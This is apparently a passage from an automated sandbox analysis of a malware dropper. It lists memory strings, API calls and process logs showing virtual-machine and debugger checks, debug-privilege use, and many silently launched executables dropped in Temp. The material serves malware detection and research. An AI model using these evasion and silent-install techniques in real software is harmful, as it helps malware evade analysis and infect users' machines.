statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunexpected app IDunknown caller pcwait for GC cyclewine_get_version
            Source: multitimer.exe, 00000004.00000003.716800272.000000001BC23000.00000004.00000001.sdmp Binary or memory string: \Registry\Machine\Software\Classes\Software\VMware, Inc._
            Source: 2mqvpn30gyk.exe Binary or memory string: ysRJ+RHiTbwksm6HrXiFI87Nw79n4zlK0CjoRjHEqok/w3y7Zm8ETB2fpytw5NJDcvJOaCRNXKXKK6HkdsypqjXfJJuFijS9QRySEofQtzRwS6y36nRNNB0mCWryajLyU2UtyBTVBD/oyJk9INFjmVduuyHYXo+TGWddXQbnoKSi5+iCcf64K1eHo0gtS1CrhRR2Wpt1fL/SWSrMKwSCdbT4tOK86inzTJVD6JuivMciCObt+4XfvqqZCEkOzPlaJg1q
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmp Binary or memory string: vmware
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp Binary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For]
            Source: multitimer.exe, 00000008.00000002.739832286.00000000034D7000.00000004.00000001.sdmp Binary or memory string: Software\VMware, Inc.
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmp Binary or memory string: ,+HKEY_CURRENT_CONFIG\Software\VMware, Inc.\.
            Source: multitimer.exe, 00000004.00000003.780388244.000000001D675000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$x
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp Binary or memory string: , s.base()=, s.npages=, settings:.WithCancel/api/report/app/vc.exe/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad GatewayBad RequestClassHESIODCloseHandleCloseWindowCoGetObjectCookie.PathCreateFileWDeleteFileWDisplayNameE-X.not.fyiENABLE_PUSHEND_HEADERSEarly HintsEnumWindowsExitProcessFreeLibraryGOTRACEBACKGetFileSizeGetFileTypeGetMessageWHTTPS_PROXYISO 8859-10ISO 8859-13ISO 8859-14ISO 8859-15ISO 8859-16ISO-8859-6EISO-8859-6IISO-8859-8EISO-8859-8IIdeographicIn-Reply-ToInstCaptureInstRuneAnyInstallDateMachineGuidMedefaidrinMessageBoxWMoveFileExWNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPRIVATE KEYPau_Cin_HauRegCloseKeyReturn-PathSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefenderWindows 874[:^xdigit:]\dsefix.exealarm clockapplicationattack_typebad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedgetpeernamegetsocknamehost is nilhttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextnotify-hostorannis.comraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsecur32.dllshell32.dllshort writetls: alert(tracealloc(traffic updunreachableupdate-dataupload-fileuserenv.dllversion=179vm detectedvmusrvc.exewininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
            Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmp Binary or memory string: trackId=eyJpdiI6IldwSEQ2VFNOcHJ2QXNXRmI5NlE2Snc9PSIsInZhbHVlIjoiVlBQU0l3aVJnQUNzend3SnlMZEdVZmZlV210TGZJUCtDcHZReTBFK01VbTh6U05NRVdxZWhZTktkb3RIb1VVMCIsIm1hYyI6Ijg1MTY0YmZkNGVmZWNjN2IwNzQyOGI4MGM5MTJlMmVmZjAyOGNlMTczMjY4M2Y1ZTBiYWUwY2QyMGYxNTkwOGEifQ%3D%3D; path=/; HttpOnly
            Source: multitimer.exe, 00000003.00000002.681258695.00000000005ED000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|O3;`
            Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmp Binary or memory string: Set-Cookie: trackId=eyJpdiI6IldwSEQ2VFNOcHJ2QXNXRmI5NlE2Snc9PSIsInZhbHVlIjoiVlBQU0l3aVJnQUNzend3SnlMZEdVZmZlV210TGZJUCtDcHZReTBFK01VbTh6U05NRVdxZWhZTktkb3RIb1VVMCIsIm1hYyI6Ijg1MTY0YmZkNGVmZWNjN2IwNzQyOGI4MGM5MTJlMmVmZjAyOGNlMTczMjY4M2Y1ZTBiYWUwY2QyMGYxNTkwOGEifQ%3D%3D; path=/; HttpOnly
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648327322.0000000000CAA000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}qM
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp Binary or memory string: unixpacketunknown pcupdate-cdnuser-agentuser32.dllvmsrvc.exewildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
            Source: svchost.exe, 00000000.00000002.653105667.0000026176880000.00000002.00000001.sdmp, SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649314292.000000001B490000.00000002.00000001.sdmp, multitimer.exe, 00000002.00000002.670146862.000000001B920000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.709320382.0000029B32140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.735872158.00000233DE690000.00000002.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.834064929.000000001B090000.00000002.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.768624246.000000001B650000.00000002.00000001.sdmp, installer.exe, 00000012.00000002.817568106.00000000009A0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: multitimer.exe, 00000004.00000003.716800272.000000001BC23000.00000004.00000001.sdmp Binary or memory string: \Registry\Machine\Software\Classes\Software\VMware, Inc.7
            Source: tpwlxkeo40z.exe, 0000000F.00000002.783880381.000000001BD70000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmp Binary or memory string: +*HKEY_LOCAL_MACHINE\Software\VMware, Inc.\.
            Source: 2mqvpn30gyk.exe Binary or memory string: TYnPeJiK23tliDi3VvLsKMj8SkyItUyOAW+9fIyC4UrJ+p6KWLQvr2nzBTj1Dy1Ji0CEoKS85jUcUk27ZZ/yLC4ahBPOU94trMZ0u1WFnab97LIFFFVhlyI203i8Yyzct4q2b6n+6/oKvML10HSAWx7p5lz+v3+tik+NyJJXWSkd47tr37jI0J/Mj46IjgHTh9AUipasGr0ZaWo2Rrqb7r425rTt9n/gha7SUTrXXEnd8sCL+trhgFSxIOnMDQ7E3xvQ
            Source: svchost.exe, 00000000.00000002.653105667.0000026176880000.00000002.00000001.sdmp, SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649314292.000000001B490000.00000002.00000001.sdmp, multitimer.exe, 00000002.00000002.670146862.000000001B920000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.709320382.0000029B32140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.735872158.00000233DE690000.00000002.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.834064929.000000001B090000.00000002.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.768624246.000000001B650000.00000002.00000001.sdmp, installer.exe, 00000012.00000002.817568106.00000000009A0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_00401B70 rdtsc 13_2_00401B70
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: 17_2_01022012 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_01022012
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: 17_2_010211D4 LoadLibraryA,GetProcAddress,CloseHandle,17_2_010211D4
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: 17_2_01034D37 mov eax, dword ptr fs:[00000030h] 17_2_01034D37
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: 17_2_01034D7D mov eax, dword ptr fs:[00000030h] 17_2_01034D7D
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: 17_2_01030E41 mov eax, dword ptr fs:[00000030h] 17_2_01030E41
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_00401000 GetCommandLineA,lstrlenA,ExitProcess,GetVersion,GetWindowsDirectoryA,lstrlenA,lstrcatA,lstrcatA,ShellExecuteExA,ExitProcess,GetForegroundWindow,GetTickCount,GetProcessHeap,13_2_00401000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: 17_2_01022012 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_01022012
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: 17_2_01022398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_01022398
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: 17_2_010283CA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_010283CA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 0 30601988b56f78c9.53290271 0 102
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe 'C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe' /verysilent /cid=12 /subid=209
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe'
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe 'C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe' /S /pubid=1 /subid=451
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe 'C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe' 57a764d042bf8
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe 'C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe' testparams
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe'
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe 'C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe' /8-23
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe'
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe 'C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe' /silent /subid=482
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe 'C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe' /verysilent /cid=12 /subid=209
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe 'C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe' 57a764d042bf8
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe 'C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe' /S /pubid=1 /subid=451
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe 'C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe' testparams
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe 'C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe'
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe 'C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe' /8-23
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe 'C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe' /silent /subid=482
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Process created: C:\Windows\hh.exe 'C:\windows\hh.exe'
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /k 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8 & exit
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe | Process created: C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe 'C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe' /VERYSILENT /p=testparams
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: 17_2_01021E6B cpuid 17_2_01021E6B
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_0103C0EB
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: EnumSystemLocalesW,17_2_0103C391
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: EnumSystemLocalesW,17_2_0103C3DC
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_0103C502
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: EnumSystemLocalesW,17_2_0103C477
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: EnumSystemLocalesW,17_2_010344C5
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: GetLocaleInfoW,17_2_0103C757
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: GetLocaleInfoW,17_2_0103C987
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_0103C87F
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: GetLocaleInfoW,17_2_01034A21
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_0103CA5A
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe | Code function: GetUserDefaultUILanguage,GetLocaleInfoW,18_2_0040B044
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe | Code function: GetLocaleInfoW,18_2_0041E034
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe | Code function: GetLocaleInfoW,18_2_0041E080
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe | Code function: GetLocaleInfoW,18_2_004AF208
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe | Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_0040A4CC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
